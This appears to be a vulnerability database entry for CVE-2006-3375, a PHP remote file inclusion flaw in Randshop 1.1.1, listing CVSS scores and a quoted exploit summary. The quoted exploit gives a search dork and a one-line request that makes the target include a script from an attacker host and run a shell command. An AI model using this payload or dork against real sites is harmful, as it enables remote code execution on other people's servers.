7.5
CVSSv2

CVE-2006-3375

Published: 06/07/2006 Updated: 19/10/2017
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

PHP remote file inclusion vulnerability in includes/header.inc.php in Randshop 1.1.1 allows remote malicious users to execute arbitrary PHP code via the dateiPfad parameter.

Vulnerable Product Search on Vulmon Subscribe to Product

randshop randshop 1.1.1

Exploits

Title : randshop <= 111 Remote File Inclusion Vulnerability - URL : wwwrandshopcom/ - Author : OLiBekaS - contact : olibekas[at]gmailcom - dork : "software 2004-2005 by randshop" - exploit : [target]/[path]/includes/headerincphp?dateiPfad=[attacker]/cmdtxt?&cmd=ls - greatz : ...